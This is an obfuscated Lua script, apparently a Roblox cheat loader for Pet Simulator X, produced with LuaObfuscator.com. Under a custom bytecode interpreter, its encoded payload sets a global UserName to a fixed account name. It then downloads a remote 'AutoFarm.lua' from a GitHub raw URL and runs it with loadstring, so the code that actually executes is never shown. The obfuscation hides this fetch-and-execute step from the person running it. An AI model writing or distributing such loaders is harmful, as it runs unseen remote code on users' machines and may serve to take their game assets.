--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=0;local v68;while true do if (v67==0) then v68=v2(v0(v30,16));if v19 then local v95=v5(v68,v19);v19=nil;return v95;else return v68;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v69-(v69%(932 -(857 + 74))) ;else local v70=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v70 + v70))>=v70) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + (1274 -(226 + 1024 + 20)) ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(32 + 85))) + (v38 * 256) + v37 ;end local function v24()local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(957 -(892 + 65))) then v42=v23();v43=v23();v41=1;end if (v41==(7 -4)) then if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (350 -(87 + 263)) ;else v46=1;v44=180 -(67 + 113) ;end elseif (v46==((4795 -3293) + 545)) then return ((v45==(0 -0)) and (v47 * ((1 + 0 + 0)/(0 -(0 -0))))) or (v47 * NaN) ;end return v8(v47,v46-(1975 -(802 + (592 -(416 + 26)))) ) * (v44 + (v45/((5 -3)^52))) ;end if (v41==(3 -1)) then v46=v20(v43,16 + 5 ,1028 -(915 + 82) );v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;v41=6 -(4 -1) ;end if (v41==(1 -0)) then v44=(439 -(145 + 293)) + (430 -(44 + 386)) ;v45=(v20(v43,1 -0 ,20 + 0 ) * ((793 -(368 + 423))^(100 -68))) + v42 ;v41=20 -(10 + 8) ;end end end local function v25(v48)local v49=(0 -0) -0 ;local v50;local v51;while true do if (v49==(1489 -((2078 -(1020 + 60)) + 488))) then return v6(v51);end if (v49==(1 + (1424 -(630 + 793)))) then v51={};for v74=1 + 0 , #v50 do v51[v74]=v2(v1(v3(v50,v74,v74)));end v49=3;end if (v49==(772 -(201 + 571))) then v50=nil;if  not v48 then local v92=1138 -(116 + 1022) ;while true do if (v92==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=(3 -2) + 0 ;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=887 -(261 + 624) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (0~=v52) then else v53=0 + 0 ;v54=nil;v52=1;end if (v52==2) then v57=nil;v58=nil;v52=701 -(208 + 490) ;end if (v52~=3) then else v59=nil;while true do local v76=0 + 0 ;local v77;while true do if (v76~=0) then else v77=0;while true do if (v77~=(1 + 0)) then else if (v53~=1) then else local v103=836 -(660 + 176) ;while true do if (v103==1) then local v104=0;while true do if (v104==(0 + 0)) then for v153=1,v58 do local v154=0;local v155;local v156;while true do if (v154~=(203 -(14 + 188))) then else if (v155==1) then v156=v21()~=(675 -(534 + 141)) ;elseif (v155==(1 + 1)) then v156=v24();elseif (v155==3) then v156=v25();end v59[v153]=v156;break;end if (v154==(0 + 0)) then v155=v21();v156=nil;v154=1;end end end v57[3 + 0 ]=v21();v104=1 -0 ;end if (v104==1) then v103=2 -0 ;break;end end end if (v103~=(0 -0)) then else v58=v23();v59={};v103=1 + 0 ;end if (v103~=(2 + 0)) then else v53=2;break;end end end break;end if (v77==(396 -(115 + 281))) then local v102=0 -0 ;while true do if (v102~=1) then else v77=1 + 0 ;break;end if (v102~=(0 -0)) then else if (v53==(0 -0)) then local v105=867 -(550 + 317) ;local v106;while true do if (v105==0) then v106=0 -0 ;while true do if ((0 -0)~=v106) then else local v168=0 -0 ;while true do if (v168~=1) then else v106=286 -(134 + 151) ;break;end if (0~=v168) then else v54={};v55={};v168=1666 -(970 + 695) ;end end end if (v106==(3 -1)) then v53=1991 -(582 + 1408) ;break;end if ((3 -2)==v106) then v56={};v57={v54,v55,nil,v56};v106=7 -5 ;end end break;end end end if (v53==2) then local v107=1824 -(1195 + 629) ;while true do if (1~=v107) then else return v57;end if (0==v107) then for v157=1,v23() do local v158=0 -0 ;local v159;local v160;while true do if (v158==1) then while true do if (v159==0) then v160=v21();if (v20(v160,242 -(187 + 54) ,1)~=(780 -(162 + 618))) then else local v176=0;local v177;local v178;local v179;while true do if (v176==(3 + 0)) then if (v20(v178,2 + 1 ,6 -3 )~=(1 -0)) then else v179[1 + 3 ]=v59[v179[1640 -(1373 + 263) ]];end v54[v157]=v179;break;end if (v176==(1002 -(451 + 549))) then local v181=0 + 0 ;while true do if (v181==1) then v176=3;break;end if (v181~=(0 -0)) then else if (v20(v178,1,1)==(1 -0)) then v179[1386 -(746 + 638) ]=v59[v179[2]];end if (v20(v178,1 + 1 ,2 -0 )==(342 -(218 + 123))) then v179[1584 -(1535 + 46) ]=v59[v179[3 + 0 ]];end v181=1 + 0 ;end end end if (v176~=(560 -(306 + 254))) then else local v182=0 + 0 ;while true do if (v182==1) then v176=1 -0 ;break;end if (v182~=(1467 -(899 + 568))) then else v177=v20(v160,2,2 + 1 );v178=v20(v160,4,6);v182=1;end end end if (1==v176) then v179={v22(),v22(),nil,nil};if (v177==0) then local v185=0;local v186;while true do if (v185~=(603 -(268 + 335))) then else v186=0;while true do if (v186~=0) then else v179[293 -(60 + 230) ]=v22();v179[4]=v22();break;end end break;end end elseif (v177==1) then v179[575 -(426 + 146) ]=v23();elseif (v177==(1 + 1)) then v179[1459 -(282 + 1174) ]=v23() -(2^(827 -(569 + 242))) ;elseif (v177==(8 -5)) then local v195=0;local v196;while true do if (v195==(0 + 0)) then v196=0;while true do if (v196==(1024 -(706 + 318))) then v179[1254 -(721 + 530) ]=v23() -(2^(1287 -(945 + 326))) ;v179[4]=v22();break;end end break;end end end v176=4 -2 ;end end end break;end end break;end if (v158~=0) then else v159=0 + 0 ;v160=nil;v158=701 -(271 + 429) ;end end end for v161=1,v23() do v55[v161-(1 + 0) ]=v28();end v107=1501 -(1408 + 92) ;end end end v102=1087 -(461 + 625) ;end end end end break;end end end break;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v93=0,v86 do if (v93>=v80) then v84[v93-v80 ]=v85[v93 + 1 ];else v88[v93]=v85[v93 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v94=0;while true do if (v94==1) then if (v91<=11) then if (v91<=5) then if (v91<=2) then if (v91<=0) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==1) then v88[v90[2]]=v90[3];else local v129=0;local v130;while true do if (v129==0) then v130=v90[2];v88[v130]=v88[v130](v13(v88,v130 + 1 ,v83));break;end end end elseif (v91<=3) then v88[v90[2]]=v90[3]~=0 ;elseif (v91==4) then v88[v90[2]][v90[3]]=v90[4];else local v133=v90[2];local v134=v88[v90[3]];v88[v133 + 1 ]=v134;v88[v133]=v134[v90[4]];end elseif (v91<=8) then if (v91<=6) then v88[v90[2]]=v90[3];elseif (v91>7) then v88[v90[2]]=v62[v90[3]];else v88[v90[2]][v90[3]]=v90[4];end elseif (v91<=9) then for v121=v90[2],v90[3] do v88[v121]=nil;end elseif (v91>10) then do return;end else for v163=v90[2],v90[3] do v88[v163]=nil;end end elseif (v91<=17) then if (v91<=14) then if (v91<=12) then v88[v90[2]]();elseif (v91>13) then v82=v90[3];else local v143=v90[2];v88[v143]=v88[v143](v13(v88,v143 + 1 ,v83));end elseif (v91<=15) then local v111=v90[2];local v112,v113=v81(v88[v111](v13(v88,v111 + 1 ,v90[3])));v83=(v113 + v111) -1 ;local v114=0;for v123=v111,v83 do local v124=0;while true do if (0==v124) then v114=v114 + 1 ;v88[v123]=v112[v114];break;end end end elseif (v91==16) then local v145=0;local v146;local v147;local v148;local v149;while true do if (0==v145) then v146=v90[2];v147,v148=v81(v88[v146](v13(v88,v146 + 1 ,v90[3])));v145=1;end if (v145==1) then v83=(v148 + v146) -1 ;v149=0;v145=2;end if (v145==2) then for v173=v146,v83 do v149=v149 + 1 ;v88[v173]=v147[v149];end break;end end elseif (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91<=20) then if (v91<=18) then v88[v90[2]]=v90[3]~=0 ;elseif (v91>19) then do return;end else v82=v90[3];end elseif (v91<=21) then local v116=v90[2];local v117=v88[v90[3]];v88[v116 + 1 ]=v117;v88[v116]=v117[v90[4]];elseif (v91==22) then v88[v90[2]]=v62[v90[3]];else v88[v90[2]]();end v82=v82 + 1 ;break;end if (0==v94) then v90=v78[v82];v91=v90[1];v94=1;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365724E616D6503083O00737562612O303537030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100163O0012063O00014O000A000100013O0026113O0002000100010004133O00020001001206000100013O00261100010005000100010004133O00050001001216000200023O003007000200030004001216000200053O001216000300063O002015000300030007001206000500084O0003000600014O000F000300064O000D00023O00022O00170002000100010004133O001500010004133O000500010004133O001500010004133O000200012O000B3O00017O00",v9(),...);end
